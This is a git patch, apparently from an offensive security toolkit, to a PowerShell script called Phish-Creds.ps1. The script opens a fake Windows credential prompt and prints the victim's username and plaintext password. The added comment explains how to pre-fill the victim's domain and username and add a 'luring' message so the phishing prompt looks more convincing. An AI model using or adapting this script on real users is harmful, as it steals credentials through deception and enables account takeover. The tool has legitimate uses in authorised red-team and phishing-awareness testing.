From 1f56f075762d6c0f5d7009547c5554de68e9d5ec Mon Sep 17 00:00:00 2001 From: Mariusz Date: Sun, 18 Mar 2018 23:51:10 +0100 Subject: [PATCH] Update Phish-Creds.ps1 --- social-engineering/Phish-Creds.ps1 | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/social-engineering/Phish-Creds.ps1 b/social-engineering/Phish-Creds.ps1 index 0679d75..7c67685 100644 --- a/social-engineering/Phish-Creds.ps1 +++ b/social-engineering/Phish-Creds.ps1 @@ -13,6 +13,12 @@ try { } catch { } +One can additionally add, right after Get-Credential following parameters that could improve +pretext's quality during social engineering attempt: + +-Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog +-Message "Some luring sentence" - to include some luring message + #> -try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { } \ No newline at end of file +try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }